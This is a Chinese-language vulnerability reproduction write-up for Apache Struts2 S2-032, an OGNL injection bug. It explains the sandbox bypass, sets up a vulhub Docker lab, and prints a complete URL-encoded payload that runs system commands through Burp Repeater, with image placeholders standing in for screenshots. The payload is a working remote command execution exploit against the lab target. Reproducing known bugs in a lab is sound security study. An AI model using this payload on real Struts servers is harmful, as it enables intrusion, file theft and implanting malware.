影响范围

  • Struts 2.3.18 - 2.3.28(不包括 2.3.20.2 和 2.3.24.2)

漏洞类型

OGNL 表达式注入

操作系统限制

配置要求

默认配置

漏洞利用

执行命令,可以执行各种敏感操作,例如任意文件读取,植入木马,内网探测

利用原理

在配置文件 struts.xml 开启了 devMode(开发者模式),其中允许通过 method 前缀来动态执行 Action 方法。Struts2 内部存在一个安全沙盒,默认禁止执行危险的 Java 方法,为允许调用执行系统命令所需 Java 类,将上下文访问权限重置为默认,payload 片段为 #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS。权限限制接触后,攻击者通过调用 Java 环境的 Runtime 环境执行系统级别的命令,payload 片段为 @java.lang.Runtime@getRuntime ().exec(‘id’),其中 id 可替换成其他敏感命令

漏洞复现

用现成的 vulhub 来拉取镜像

1
2
3
4
5
6
#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/struts2/s2-032
#拉取镜像
docker-compose up -d

1773316738135

用 burpsuite 抓取 http://公网: 8080/index.action 流量包

1773316931101

发送到 Repeater 模块

1773316855000

加上参数 payload

1
?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

1773316979886

成功执行命令 id

1773317026124